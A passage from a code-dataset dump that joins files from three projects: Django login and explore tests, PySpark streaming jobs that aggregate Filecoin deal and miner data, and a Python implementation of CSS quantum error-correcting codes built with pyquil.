response.delete_cookie(settings.PASSWORD_COOKIE, path=settings.COOKIE_PATH)
else:
response.delete_cookie(settings.USER_COOKIE,
path=settings.COOKIE_PATH,
domain=settings.COOKIE_DOMAIN)
response.delete_cookie(settings.PASSWORD_COOKIE,
path=settings.COOKIE_PATH,
domain=settings.COOKIE_DOMAIN)
return response
```
#### File: jaikuengine/explore/tests.py
```python
from django.conf import settings
from common import api
from common import normalize
from common import profile
from common import util
from common.tests import ViewTestCase
class ExploreTest(ViewTestCase):
def test_explore_when_signed_out(self):
l = profile.label('explore_get_public')
r = self.client.get('/explore')
l.stop()
self.assertContains(r, "Latest Public Posts")
self.assertTemplateUsed(r, 'explore/templates/recent.html')
def test_explore_when_signed_in(self):
self.login('popular')
l = profile.label('explore_get_logged_in')
r = self.client.get('/explore')
l.stop()
self.assertContains(r, "Latest Public Posts")
self.assertTemplateUsed(r, 'explore/templates/recent.html')
```
#### File: jaikuengine/front/views.py
```python
import logging
import random
from django.conf import settings
from django.template import RequestContext, loader
from django.http import HttpResponse, HttpResponseRedirect
from common import exception
from common import user
from common.models import Actor
from common import api, util
from common.display import prep_stream_dict, prep_entry_list
ENTRIES_PER_PAGE = 5
SIDEBAR_LIMIT = 9
SIDEBAR_FETCH_LIMIT = 50
def front_front(request):
# if the user is logged in take them to their overview
if request.user:
return HttpResponseRedirect(request.user.url() + "/overview")
# NOTE: grab a bunch of extra so that we don't ever end up with
# less than 5
per_page = ENTRIES_PER_PAGE * 2
inbox = api.inbox_get_explore(request.user, limit=per_page)
# START inbox generation chaos
# TODO(termie): refacccttttooorrrrr
entries = api.entry_get_entries(request.user, inbox)
per_page = per_page - (len(inbox) - len(entries))
entries, more = util.page_entries(request, entries, per_page)
stream_keys = [e.stream for e in entries]
streams = api.stream_get_streams(request.user, stream_keys)
actor_nicks = [e.owner for e in entries] + [e.actor for e in entries]
actors = api.actor_get_actors(request.user, actor_nicks)
# take it back down and don't show a more link
entries = entries[:ENTRIES_PER_PAGE]
more = None
# here comes lots of munging data into shape
streams = prep_stream_dict(streams, actors)
entries = prep_entry_list(entries, streams, actors)
# END inbox generation chaos
try:
# Featured Channels -- Ones to which the ROOT user is a member
featured_channels = api.actor_get_channels_member(
request.user, api.ROOT.nick, limit=SIDEBAR_FETCH_LIMIT)
random.shuffle(featured_channels)
# Just in case any are deleted:
featured_channels = featured_channels[:2*SIDEBAR_LIMIT]
featured_channels = api.channel_get_channels(
request.user, featured_channels)
featured_channels = [x for x in featured_channels.values() if x]
featured_channels = featured_channels[:SIDEBAR_LIMIT]
featured_members = api.actor_get_contacts(
request.user, api.ROOT.nick, limit=SIDEBAR_FETCH_LIMIT)
random.shuffle(featured_members)
# Just in case any are deleted:
featured_members = featured_members[:2*SIDEBAR_LIMIT]
featured_members = api.actor_get_actors(request.user, featured_members)
featured_members = [x for x in featured_members.values() if x]
featured_members = featured_members[:SIDEBAR_LIMIT]
except exception.ApiNotFound:
pass
root = api.ROOT
area = 'frontpage'
t = loader.get_template('front/templates/front.html')
c = RequestContext(request, locals())
return HttpResponse(t.render(c))
```
#### File: jaikuengine/login/tests.py
```python
from django.conf import settings
from common.tests import ViewTestCase
from common import api
from common import clean
from common import exception
from common import util
class LoginTest(ViewTestCase):
def test_login_when_signed_out(self):
r = self.login_and_get(None, '/login')
self.assertContains(r, "Forgot your password?")
self.assertContains(r, "Sign Up Now")
self.assertTemplateUsed(r, 'login/templates/login.html')
def test_login_when_signed_in(self):
r = self.login_and_get('popular', '/login')
r = self.assertRedirectsPrefix(r, '/user/popular/overview')
self.assertTemplateUsed(r, 'actor/templates/overview.html')
self.assertTemplateUsed(r, 'common/templates/flash.html')
def test_login_redirect_to(self):
r = self.login_and_get('popular', '/login', {'redirect_to': '/channel'})
r = self.assertRedirectsPrefix(r, '/channel')
self.assertTemplateUsed(r, 'channel/templates/index.html')
self.assertTemplateUsed(r, 'common/templates/flash.html')
def test_login(self):
log = 'popular'
pwd = self.passwords[clean.nick(log)]
r = self.client.post('/login', {'log': log, 'pwd': pwd})
r = self.assertRedirectsPrefix(r, '/user/popular/overview')
self.assertTemplateUsed(r, 'actor/templates/overview.html')
self.assertTemplateUsed(r, 'common/templates/flash.html')
def test_login_with_confirmed_email(self):
log = 'hotness'
pwd = self.passwords[clean.nick(log)]
confirmed_email = '<EMAIL>'
r = self.client.post('/login', {'log': confirmed_email, 'pwd': pwd})
r = self.assertRedirectsPrefix(r, '/user/hotness/overview')
self.assertTemplateUsed(r, 'actor/templates/overview.html')
self.assertTemplateUsed(r, 'common/templates/flash.html')
def test_login_bad_password(self):
log = 'popular'
pwd = '<PASSWORD>'
r = self.client.post('/login', {'log': log, 'pwd': pwd})
self.assert_error_contains(r, 'Invalid username or password')
self.assertTemplateUsed(r, 'login/templates/login.html')
def test_login_bad_user(self):
log = 'BAD USER'
pwd = '<PASSWORD>'
r = self.client.post('/login', {'log': log, 'pwd': pwd})
self.assert_error_contains(r, 'Invalid username or password')
self.assertTemplateUsed(r, 'login/templates/login.html')
def test_login_user_cleanup(self):
log = 'broken'
pwd = self.passwords[clean.nick(log)]
actor_ref_pre = api.actor_get(api.ROOT, log)
self.assert_(not actor_ref_pre.normalized_nick)
self.assertRaises(exception.ApiException,
api.stream_get_presence,
api.ROOT,
log)
self.assertRaises(exception.ApiException,
api.stream_get_comment,
api.ROOT,
log)
r = self.client.post('/login', {'log': log, 'pwd': pwd})
r = self.assertRedirectsPrefix(r, '/user/broken/overview')
actor_ref_post = api.actor_get(api.ROOT, log)
self.assert_(actor_ref_post.normalized_nick)
self.assert_(api.stream_get_presence(api.ROOT, log))
self.assert_(api.stream_get_comment(api.ROOT, log))
def test_login_deleted(self):
log = 'popular'
pwd = self.passwords[clean.nick(log)]
r = self.client.post('/login', {'log': log, 'pwd': pwd})
r = self.assertRedirectsPrefix(r, '/user/popular/overview')
self.assertTemplateUsed(r, 'actor/templates/overview.html')
self.assertTemplateUsed(r, 'common/templates/flash.html')
api.actor_remove(api.ROOT, 'popular')
r = self.client.post('/login', {'log': log, 'pwd': <PASSWORD>})
self.assert_error_contains(r, 'Invalid username')
self.assertTemplateUsed(r, 'login/templates/login.html')
# Test cases and expected outcomes:
# 'annoying', 'girlfriend' do not have an email associated
# 'hermit' has an unconfirmed email
class LoginForgotTest(ViewTestCase):
##### Forgot password tests:
def test_login_forgot_already_logged_in(self):
r = self.login_and_get('popular', '/login/forgot')
# User gets sent back to the home page. Unfortunately, since this is
# 'prefix', it will match a redirect anywhere. :(
r = self.assertRedirectsPrefix(r, '/', target_status_code=302)
# For this reason, test the second redirect:
r = self.assertRedirectsPrefix(r, '/user/popular/overview')
def test_login_forgot(self):
r = self.client.get('/login/forgot')
self.assertTemplateUsed(r, 'login/templates/forgot.html')
def test_login_forgot_nick_popular(self):
r = self.client.post('/login/forgot',
{
'_nonce': util.create_nonce(None, 'login_forgot'),
'login_forgot' : '',
'nick_or_email' : 'popular',
})
r = self.assertRedirectsPrefix(r, '/login/forgot')
self.assertTemplateUsed(r, 'login/templates/forgot.html')
self.assertContains(r, 'New Password Emailed')
self.assertTemplateUsed(r, 'common/templates/flash.html')
# User enters 'popular', 'popular' has a confirmed email.
# - Send notification to that email.
def test_nick_confirmed(self):
r = self.client.post('/login/forgot',
{
'_nonce': util.create_nonce(None, 'login_forgot'),
'login_forgot' : '',
'nick_or_email' : 'popular',
})
r = self.assertRedirectsPrefix(r, '/login/forgot')
self.assertTemplateUsed(r, 'login/templates/forgot.html')
self.assertContains(r, 'New Password Emailed')
self.assertTemplateUsed(r, 'common/templates/flash.html')
# User enters 'hermit', 'hermit' has an unconfirmed email
# - Send notification to that email.
def test_nick_unconfirmed(self):
r = self.client.post('/login/forgot',
{
'_nonce': util.create_nonce(None, 'login_forgot'),
'login_forgot' : '',
'nick_or_email' : 'hermit',
})
r = self.assertRedirectsPrefix(r, '/login/forgot')
self.assertTemplateUsed(r, 'login/templates/forgot.html')
self.assertContains(r, 'New Password Emailed')
self.assertTemplateUsed(r, 'common/templates/flash.html')
# TODO(termie): stub
# User enters 'popular', 'popular' has an unconfirmed email (shared with other
# users)
# - Send notification to that email.
def test_nick_multiple_unconfirmed(self):
pass
# User enters 'annoying', 'annoying' does not have an email
# - Tough shit.
def test_nick_no_email(self):
r = self.client.post('/login/forgot',
{
'_nonce': util.create_nonce(None, 'login_forgot'),
'login_forgot' : '',
'nick_or_email' : 'annoying',
})
self.assertTemplateUsed(r, 'login/templates/forgot.html')
self.assertContains(r, 'does not have an email')
# User enters a user that doesn't exist
# - Tough shit.
def test_unknown_nick(self):
r = self.client.post('/login/forgot',
{
'_nonce': util.create_nonce(None, 'login_forgot'),
'login_forgot' : '',
'nick_or_email' : 'idontexist',
})
self.assertTemplateUsed(r, 'login/templates/forgot.html')
self.assertContains(r, 'not found')
# User enters '<EMAIL>', a confirmed email for 'popular'
# - Send notification to that email.
def test_email_confirmed(self):
r = self.client.post('/login/forgot',
{
'_nonce': util.create_nonce(None, 'login_forgot'),
'login_forgot' : '',
'nick_or_email' : '<EMAIL>',
})
r = self.assertRedirectsPrefix(r, '/login/forgot')
self.assertTemplateUsed(r, 'login/templates/forgot.html')
self.assertContains(r, 'New Password Emailed')
self.assertTemplateUsed(r, 'common/templates/flash.html')
# User enters '<EMAIL>', an unconfirmed email for 'hermit'
# - Send notification to that email
def test_email_unconfirmed(self):
r = self.client.post('/login/forgot',
{
'_nonce': util.create_nonce(None, 'login_forgot'),
'login_forgot' : '',
'nick_or_email' : '<EMAIL>',
})
r = self.assertRedirectsPrefix(r, '/login/forgot')
self.assertTemplateUsed(r, 'login/templates/forgot.html')
self.assertContains(r, 'New Password Emailed')
self.assertTemplateUsed(r, 'common/templates/flash.html')
# TODO(termie): stub
# User enters '<EMAIL>', an unconfirmed email for 'popular', 'unpopular'
# - Tough shit.
def test_email_multiple_unconfirmed(self):
pass
# User enters '<EMAIL>', which doesn't map to anything
# - Tough shit.
def test_email_notfound(self):
r = self.client.post('/login/forgot',
{
'_nonce': util.create_nonce(None, 'login_forgot'),
'login_forgot' : '',
'nick_or_email' : '<EMAIL>',
})
self.assertTemplateUsed(r, 'login/templates/forgot.html')
self.assertContains(r, 'does not match any accounts')
class LogoutTest(ViewTestCase):
# Once user is logged out, we should not display the "Signed in as XXX" msg.
# See issue 336 for details
def test_logout_does_not_remain_signed_in(self):
r = self.login_and_get('popular', '/login')
self.assertRedirectsPrefix(r, '/user/popular/overview')
r = self.client.get('/logout')
self.assertTemplateUsed(r, 'login/templates/logout.html')
self.assertNotContains(r, "Signed in as")
``` |
{
"source": "jimpick/miner-report-spark",
"score": 2
} |
#### File: src/deals/deals_sample.py
```python
from pyspark.sql.functions import window
from pyspark.sql.functions import expr
from pyspark.sql.functions import last
from pyspark.sql.functions import avg
from pyspark.sql.functions import min, max, sum, approx_count_distinct
def process(deals, suffix=""):
outputDir = '../work/output' + suffix
checkpointDir = '../work/checkpoint' + suffix
### Sample deals
dealsDailyByDealId = deals.groupBy(
deals.date,
window(deals.messageTime, '1 day'),
deals.dealId
).agg(
last(deals.pieceCid).alias('pieceCid'),
last(deals.pieceSize).alias('pieceSize'),
last(deals.provider).alias('provider'),
last(deals.label).alias('label'),
last(deals.startEpoch).alias('startEpoch'),
last(deals.startTime).alias('startTime'),
last(deals.endEpoch).alias('endEpoch'),
last(deals.endTime).alias('endTime')
)
querySampleDealsByPieceSize = dealsDailyByDealId \
.writeStream \
.queryName("deals_sample_by_piece_size_json") \
.format("json") \
.option("path", outputDir + "/deals/sample/by_piece_size/json") \
.option("checkpointLocation", checkpointDir + "/deals/sample/by_piece_size/json") \
.partitionBy("pieceSize", "date") \
.trigger(processingTime='1 minute') \
.start()
querySampleDealsByProviderPieceSize = dealsDailyByDealId \
.writeStream \
.queryName("deals_sample_by_provider_by_piece_size_json") \
.format("json") \
.option("path", outputDir + "/deals/sample/by_provider/by_piece_size/json") \
.option("checkpointLocation", checkpointDir + "/deals/sample/by_provider/by_piece_size/json") \
.partitionBy("provider", "pieceSize", "date") \
.trigger(processingTime='1 minute') \
.start()
querySampleDealsByLabelProvider = dealsDailyByDealId \
.writeStream \
.queryName("deals_sample_by_label_by_provider_json") \
.format("json") \
.option("path", outputDir + "/deals/sample/by_label/by_provider/json") \
.option("checkpointLocation", checkpointDir + "/deals/sample/by_label/by_provider/json") \
.partitionBy("label", "provider", "date") \
.trigger(processingTime='1 minute') \
.start()
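# Note on output layout (paths are illustrative): each partitionBy() sink above writes
# Hive-style partition directories, e.g.
#   <outputDir>/deals/sample/by_provider/by_piece_size/json/provider=<id>/pieceSize=<n>/date=<YYYY-MM-DD>/part-*.json
# with one directory level per partition column, in the order passed to partitionBy().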
```
#### File: src/deals/deals_source.py
```python
from pyspark.sql.functions import expr
from pyspark.sql.functions import hour
from pyspark.sql.functions import concat_ws
from pyspark.sql.types import StructType
def get(spark, suffix=""):
inputDir = 'input' + suffix
schemaDeals = StructType() \
.add("dealId", "long") \
.add("messageHeight", "long") \
.add("messageTime", "timestamp") \
.add("messageCid", "string") \
.add("pieceCid", "string") \
.add("pieceSize", "long") \
.add("verifiedDeal", "boolean") \
.add("client", "string") \
.add("provider", "string") \
.add("label", "string") \
.add("startEpoch", "long") \
.add("startTime", "timestamp") \
.add("endEpoch", "long") \
.add("endTime", "timestamp") \
.add("storagePricePerEpoch", "string") \
.add("providerCollateral", "string") \
.add("clientCollateral", "string")
deals = spark \
.readStream \
.schema(schemaDeals) \
.json(inputDir + '/deals') \
.withWatermark("messageTime", "1 minute")
deals = deals \
.withColumn("date", deals.messageTime.astype('date')) \
.withColumn("hour", hour(deals.messageTime)) \
.withColumn("clientProvider", concat_ws('-', deals.client, deals.provider)) \
.withColumn("storagePricePerEpochDouble", deals.storagePricePerEpoch.astype('double')) \
.withColumn("providerCollateralDouble", deals.providerCollateral.astype('double')) \
.withColumn("clientCollateralDouble", deals.clientCollateral.astype('double')) \
.withColumn("pieceSizeDouble", deals.pieceSize.astype('double')) \
.withColumn("lifetimeValue",
expr("storagePricePerEpochDouble * (endEpoch - startEpoch) * " +
"pieceSize / 1e18 / 1024 / 1024 / 1024"))
return deals
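# Sketch of how this source is typically wired up (assumes a SparkSession named `spark`
# and the deals_sample module from this repo; the driver layout is a guess):
#
#   from pyspark.sql import SparkSession
#   import deals_sample
#
#   spark = SparkSession.builder.appName("miner-report-spark").getOrCreate()
#   deals_sample.process(get(spark))
#   spark.streams.awaitAnyTermination()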
```
#### File: src/ips_baidu/ips_baidu.py
```python
import sys
import time
from pyspark.sql.functions import window
from pyspark.sql.functions import last
from pyspark.sql.types import StructType, ArrayType, MapType, StringType
def process(spark, suffix=""):
inputDir = 'input' + suffix
outputDir = '../work/output' + suffix
checkpointDir = '../work/checkpoint' + suffix
schemaIpsBaidu = StructType() \
.add("epoch", "long") \
.add("timestamp", "timestamp") \
.add("ip", "string") \
.add("city", "string") \
.add("long", "float") \
.add("lat", "float") \
.add("baidu", "string")
ipsBaidu = spark \
.readStream \
.schema(schemaIpsBaidu) \
.json(inputDir + '/ips-baidu') \
.withWatermark("timestamp", "1 minute")
ipsBaidu = ipsBaidu.withColumn(
"date", ipsBaidu.timestamp.astype('date'))
queryArchiveIpsBaidu = ipsBaidu \
.writeStream \
.queryName("ips_baidu_json") \
.format("json") \
.option("path", outputDir + "/ips_baidu/json") \
.option("checkpointLocation", checkpointDir + "/ips_baidu/json") \
.partitionBy("ip", "date") \
.trigger(processingTime='1 minute') \
.start()
latestIpsBaidu = ipsBaidu \
.groupBy(
'ip'
).agg(
last('epoch'),
last('timestamp'),
last('city'),
last('long'),
last('lat'),
last('baidu')
)
def output_latest_ips_baidu(df, epoch_id):
df.coalesce(1).write.json(
outputDir + '/ips_baidu/json_latest', mode='overwrite')
queryLatestIpsBaidu = latestIpsBaidu \
.writeStream \
.queryName("ips_baidu_latest_json") \
.outputMode('complete') \
.option("checkpointLocation", checkpointDir + "/ips_baidu/json_latest") \
.foreachBatch(output_latest_ips_baidu) \
.trigger(processingTime='1 minute') \
.start()
return ipsBaidu
```
#### File: src/miner_info/miner_info.py
```python
import sys
import time
from pyspark.sql.functions import window
from pyspark.sql.functions import last
from pyspark.sql.types import StructType, ArrayType, MapType, StringType
def process_miner_info(spark, suffix=""):
inputDir = 'input' + suffix
outputDir = '../work/output' + suffix
checkpointDir = '../work/checkpoint' + suffix
schemaInfo = StructType() \
.add("epoch", "long") \
.add("timestamp", "timestamp") \
.add("tipSet", "string") \
.add("miner", "string") \
.add("owner", "string") \
.add("worker", "string") \
.add("newWorker", "string") \
.add("controlAddresses", ArrayType(StringType())) \
.add("peerId", "string") \
.add("multiaddrs", ArrayType(StringType())) \
.add("multiaddrsDecoded", ArrayType(StringType())) \
.add("windowPoStProofType", "short") \
.add("sectorSize", "long") \
.add("windowPoStPartitionSectors", "long") \
.add("consensusFaultElapsed", "long") \
.add("dnsLookups", MapType(
StringType(),
ArrayType(StringType())
))
minerInfo = spark \
.readStream \
.schema(schemaInfo) \
.json(inputDir + '/miner-info') \
.withWatermark("timestamp", "1 minute")
minerInfo = minerInfo.withColumn(
"date", minerInfo.timestamp.astype('date'))
numberOfInfoRecords = minerInfo.groupBy().count()
latestMinerInfoSubset = minerInfo \
.groupBy('miner') \
.agg(
last('epoch'), \
last('timestamp'), \
last('sectorSize'), \
last('peerId'), \
last('multiaddrsDecoded'), \
last('dnsLookups') \
)
"""
queryInfoCounter = numberOfInfoRecords \
.writeStream \
.queryName("miner_info_counter") \
.outputMode('complete') \
.format('console') \
.trigger(processingTime='1 minute') \
.start()
queryMinerInfoArchive = minerInfo \
.writeStream \
.queryName("miner_info_json") \
.format("json") \
.option("path", outputDir + "/miner_info/json") \
.option("checkpointLocation", checkpointDir + "/miner_info/json") \
.partitionBy("date", "miner") \
.trigger(processingTime='1 minute') \
.start()
"""
def output_latest_miner_info_subset(df, epoch_id):
df.coalesce(1).write.json(
outputDir + '/miner_info/json_latest_subset', mode='overwrite')
queryMinerInfoSubsetLatest = latestMinerInfoSubset \
.writeStream \
.queryName("miner_info_subset_latest_json") \
.outputMode('complete') \
.option("checkpointLocation", checkpointDir + "/miner_info/json_latest_subset") \
.foreachBatch(output_latest_miner_info_subset) \
.trigger(processingTime='1 minute') \
.start()
``` |
{
"source": "jimpo/quantum-css-codes",
"score": 3
} |
#### File: jimpo/quantum-css-codes/css_code.py
```python
import itertools
import numpy as np
import pyquil.gates as gates
from pyquil.paulis import PauliTerm, ID, sX, sY, sZ
from pyquil.quil import Program
from pyquil.quilatom import MemoryReference, Qubit, QubitPlaceholder
from pyquil.quilbase import Gate
from typing import List, Union
import bin_matrix
from qecc import CodeBlock, QECC
import quil_classical
from quil_classical import MemoryChunk
from errors import InvalidCodeError, UnsupportedGateError
class CSSCode(QECC):
"""
A Calderbank-Steane-Shor (CSS) code is defined by two binary linear codes C_1, C_2 such that the
dual code of C_2 is a subspace of C_1. If C_1 is a [n, k_1, d_1] code and C_2 is a [n, k_2, d_2]
code, then the logical Hilbert space of the CSS code has dimension k_1 + k_2 - n and minimum
distance min(d_1, d_2).
The physical qubits of a CSS codeword are a classical codeword of C_1 when measured in the X
basis and a classical codeword of C_2 when measured in the Z basis. This is the opposite of the
usual nomenclature.
"""
def __init__(self, parity_check_c1, parity_check_c2):
# Validate input codes
r_1, n_1 = parity_check_c1.shape
r_2, n_2 = parity_check_c2.shape
if n_1 != n_2:
raise ValueError("C_1 and C_2 must have the same code word length")
h_1 = np.mod(np.array(parity_check_c1, dtype='int'), 2)
h_2 = np.mod(np.array(parity_check_c2, dtype='int'), 2)
if not np.array_equal(h_1, parity_check_c1):
raise ValueError("C_1 parity check matrix must be binary")
if not np.array_equal(h_2, parity_check_c2):
raise ValueError("C_2 parity check matrix must be binary")
# Check that the C_2 dual code is a subspace of C_1.
prod = np.mod(np.matmul(h_1, np.transpose(h_2)), 2)
if np.any(prod):
raise ValueError("C_2 dual code must be a subspace of C_1")
# Put H_1 and H_2 into standard form. In standard form, H_1 is represented as [I A_1 A_2]
# where I has width r_1, A_1 has width r_2, and A_2 has width n - r_1 - r_2. H_2 is
# represented as [D I E], where D has width r_1, I has width r_2, and E has width
# n - r_1 - r_2.
h_1, qubit_swaps = normalize_parity_check(h_1, offset=0)
for indices in qubit_swaps:
swap_columns(h_2, indices)
h_2, qubit_swaps = normalize_parity_check(h_2, offset=r_1)
for indices in qubit_swaps:
swap_columns(h_1, indices)
self._n = n_1
self._k = n_1 - r_1 - r_2
self.r_1 = r_1
self.r_2 = r_2
self.parity_check_c1 = h_1
self.parity_check_c2 = h_2
t_1, self._c1_syndromes = syndrome_table(h_1)
t_2, self._c2_syndromes = syndrome_table(h_2)
self._t = min(t_1, t_2)
self._transversal_gates = self._determine_transversal_gates(h_1, h_2)
if self.k != 1:
raise InvalidCodeError("currently only supports CSS codes for a single logical qubit")
@property
def n(self):
"""
Number of physical qubits per code block.
"""
return self._n
@property
def k(self):
"""
Number of logical qubits per code block.
"""
return self._k
@property
def t(self):
"""
Maximum number of errors per code block that can be corrected.
"""
return self._t
def stabilisers(self) -> List[PauliTerm]:
"""
Generate a list of generators of the stabiliser group.
"""
zeros = np.zeros(self.n, dtype='int')
x_stabilisers = (
pauli_term_for_row(self.parity_check_c1[i, :], zeros)
for i in range(self.r_1)
)
z_stabilisers = (
pauli_term_for_row(zeros, self.parity_check_c2[i, :])
for i in range(self.r_2)
)
return list(itertools.chain(x_stabilisers, z_stabilisers))
def z_operators(self) -> List[PauliTerm]:
"""
Returns the logical Z operators chosen for this CSS code as Pauli terms.
"""
z_matrix = self.z_operator_matrix()
zeros = np.zeros_like(z_matrix, dtype='int')
return [
pauli_term_for_row(zeros[i, :], z_matrix[i, :])
for i in range(self.k)
]
def z_operator_matrix(self):
"""
Returns a check matrix for the logical Z operators chosen for this CSS code.
See Nielsen & Chuang section 10.5.7 for the method of choosing operators.
"""
n, r_1, r_2, k = self.n, self.r_1, self.r_2, self.k
# Use the row vector [ A2^T 0 I ], which commutes with the check matrix.
check_mat = np.zeros((k, n), dtype='int')
check_mat[:, 0:r_1] = np.transpose(self.parity_check_c1[:, (r_1 + r_2):n])
check_mat[:, (r_1 + r_2):n] = np.identity(k)
return check_mat
def x_operators(self) -> List[PauliTerm]:
"""
Returns the logical X operators chosen for this CSS code as Pauli terms.
"""
x_matrix = self.x_operator_matrix()
zeros = np.zeros_like(x_matrix, dtype='int')
return [
pauli_term_for_row(x_matrix[i, :], zeros[i, :])
for i in range(self.k)
]
def x_operator_matrix(self):
"""
Returns a check matrix for the logical X operators chosen for this CSS code.
See Nielsen & Chuang section 10.5.7 for the method of choosing operators.
"""
n, r_1, r_2, k = self.n, self.r_1, self.r_2, self.k
# Use the row vector [ 0 E^T I | 0 0 0 ], which commutes with the check matrix.
check_mat = np.zeros((k, n), dtype='int')
check_mat[:, r_1:(r_1 + r_2)] = np.transpose(self.parity_check_c2[:, (r_1 + r_2):n])
check_mat[:, (r_1 + r_2):n] = np.identity(k)
return check_mat
def y_operators(self) -> List[PauliTerm]:
"""
Returns the logical Y operators chosen for this CSS code as Pauli terms.
"""
# Y = iXZ
y_operators = [1j * x_op * z_op
for x_op, z_op in zip(self.x_operators(), self.z_operators())]
for y_op in y_operators:
assert y_op.coefficient == 1
return y_operators
def is_transversal(self, gate_name: str) -> bool:
"""
Determines whether a quantum gate is known to be fault tolerant with transversal
application. Transversal application is when the logical gate can be implemented by
application of the physical gate to each individual qubit.
"""
return gate_name in self._transversal_gates
def _determine_transversal_gates(self, parity_check_c1, parity_check_c2):
# See "Efficient fault-tolerant quantum computing" by <NAME> for rationales.
gates = []
# I is always transversal for stabiliser codes.
gates.append('I')
# CNOT is always transversal for CSS codes. (Lemma 2, Steane 1998)
gates.append('CNOT')
# If C_1 = C_2, then H and CZ are transversal. (Lemma 3, Steane 1998)
if codes_equal(parity_check_c1, parity_check_c2):
gates.append('H')
gates.append('CZ')
# If C_1 = C_2 and is doubly even, then P transversal. (Lemma 3, Steane 1998)
if is_doubly_even(parity_check_c1):
gates.append('S')
return frozenset(gates)
def noisy_encode_zero(self, qubits: List[Union[QubitPlaceholder, int]]) -> Program:
"""
Construct a program preparing a new logical qubit in the |0> state (+1 eigenstate of \hat Z).
The qubits must all be reset to the physical |0> state at the beginning of this program. The
preparation is not fault tolerant and any physical errors that occur during preparation may
create many correlated errors in the code block.
"""
n, r_1, r_2 = self.n, self.r_1, self.r_2
# We are starting with all qubits in the |0> state, meaning they are stabilised by
# Z_1, Z_2, ..., Z_n. We want to do a unitary transformation to a state stabilised by the
# code stabilisers along with the stabilisers for the logical 0 state. In general, if a
# state |ᴪ> is stabilised by S, then U|ᴪ> is stabilised by USU†. We can perform Clifford
# gate operations to transform the stabiliser set. For details see Nielsen & Chuang
# section 10.5.2 and Problem 10.3. Also, see Appendix A of "Fault-tolerant Preparation of
# Stabilizer States for Quantum CSS Codes by Classical Error-Correcting Codes."
#
# The idea is that we want to transform the parity check matrix from
#
# [[ 0 0 0 | I1 0 0 ], [[ I1 A1 A2 | 0 0 0 ],
# [ 0 0 0 | 0 I2 0 ], => [ 0 0 0 | D I2 E ],
# [ 0 0 0 | 0 0 I3 ]] [ 0 0 0 | A2T 0 I3 ]]
#
# Transformations to manipulate the parity check are derived from Figure 10.7 in
# Nielsen & Chuang which shows how Pauli operators behave under conjugation by Clifford
# operators.
# The program accumulates the actual operations on the qubits.
prog = Program()
# Step 0: Copy Z's from I3 to E. Post-state:
#
# [[ 0 0 0 | I1 0 0 ],
# [ 0 0 0 | 0 I2 E ],
# [ 0 0 0 | 0 0 I3 ]]
#
# This is just a multiplication of stabilisers and does not require any instructions.
# Step 1: Apply Hadamards to move I1 to the X side. Post-state:
#
# [[ I1 0 0 | 0 0 0 ],
# [ 0 0 0 | 0 I2 E ],
# [ 0 0 0 | 0 0 I3 ]]
for i in range(r_1):
prog += gates.H(qubits[i])
# Step 2: Copy X's from I1 to A1 and A2. This has the side effect of constructing D and A2T.
# Post-state:
#
# [[ I1 A1 A2 | 0 0 0 ],
# [ 0 0 0 | D I2 E ],
# [ 0 0 0 | A2T 0 I3 ]]
for i in range(r_1):
for j in range(r_1, n):
if self.parity_check_c1[i, j] == 1:
prog += gates.CNOT(qubits[i], qubits[j])
return prog
def noisy_encode_plus(self, qubits: List[Union[QubitPlaceholder, int]]) -> Program:
"""
Construct a program preparing a new logical qubit in the |+> state (+1 eigenstate of \hat X).
The qubits must all be reset to the physical |0> state at the beginning of this program. The
preparation is not fault tolerant and any physical errors that occur during preparation may
create many correlated errors in the code block.
"""
# See implementation of noisy_encode_zero for more detailed comments.
n, r_1, r_2 = self.n, self.r_1, self.r_2
# The idea is that we want to transform the parity check matrix from
#
# [[ 0 0 0 | I1 0 0 ], [[ I1 A1 A2 | 0 0 0 ],
# [ 0 0 0 | 0 I2 0 ], => [ 0 0 0 | D I2 E ],
# [ 0 0 0 | 0 0 I3 ]] [ 0 ET I3 | 0 0 0 ]]
# The program accumulates the actual operations on the qubits.
prog = Program()
# Step 1: Apply Hadamards to move I1 and I3 to the X side. Post-state:
#
# [[ I1 0 0 | 0 0 0 ],
# [ 0 0 0 | 0 I2 0 ],
# [ 0 0 I3 | 0 0 0 ]]
for i in range(r_1):
prog += gates.H(qubits[i])
for i in range(r_1 + r_2, n):
prog += gates.H(qubits[i])
# Step 2: Copy Z's from I2 to E. This has the side effect of constructing ET. Post-state:
#
# [[ I1 0 0 | 0 0 0 ],
# [ 0 0 0 | 0 I2 E ],
# [ 0 ET I3 | 0 0 0 ]]
for i in range(r_1, r_1 + r_2):
for j in range(r_1 + r_2, n):
if self.parity_check_c2[i - r_1, j] == 1:
prog += gates.CNOT(qubits[j], qubits[i])
# Step 3: Copy X's from I1 to A1 and A2. This has the side effect of constructing D.
# Post-state:
#
# [[ I1 A1 A2 | 0 0 0 ],
# [ 0 0 0 | D I2 E ],
# [ 0 ET I3 | 0 0 0 ]]
for i in range(r_1):
for j in range(r_1, n):
if self.parity_check_c1[i, j] == 1:
prog += gates.CNOT(qubits[i], qubits[j])
return prog
def encode_zero(self, prog: Program, block: CodeBlock, ancilla: CodeBlock, scratch: MemoryChunk):
if len(scratch) < self.error_correct_scratch_size:
raise ValueError("scratch buffer is too small")
flag = scratch[0]
outcome = scratch[1]
scratch = scratch[2:]
# To do a somewhat fault tolerant preparation, we will do a noisy preparation of the target
# block, then perform a Steane error correction using a noisy ancilla. Instead of actually
# doing an error correction though, we will just do error detection and repeat until no
# errors are detected. If no errors are detected, then either both the block and ancilla
# were clean or they both had the exact same errors, which is unlikely. This idea comes from
# section 4.6 of "An Introduction to Quantum Error Correction and Fault-Tolerant Quantum
# Computation" by <NAME>.
loop_prog = Program()
loop_prog += gates.MOVE(flag, 0)
block.reset(loop_prog)
loop_prog += self.noisy_encode_zero(block.qubits)
self._error_detect_x(loop_prog, block, ancilla, outcome, scratch, include_operators=True)
loop_prog += gates.IOR(flag, outcome)
self._error_detect_z(loop_prog, block, ancilla, outcome, scratch, include_operators=False)
loop_prog += gates.IOR(flag, outcome)
prog += gates.MOVE(flag, 1)
prog.while_do(flag, loop_prog)
def encode_plus(self, prog: Program, block: CodeBlock, ancilla: CodeBlock, scratch: MemoryChunk):
if len(scratch) < self.error_correct_scratch_size:
raise ValueError("scratch buffer is too small")
flag = scratch[0]
outcome = scratch[1]
scratch = scratch[2:]
# See encode_zero for more thorough comments.
loop_prog = Program()
loop_prog += gates.MOVE(flag, 0)
block.reset(loop_prog)
loop_prog += self.noisy_encode_plus(block.qubits)
self._error_detect_x(loop_prog, block, ancilla, outcome, scratch, include_operators=False)
loop_prog += gates.IOR(flag, outcome)
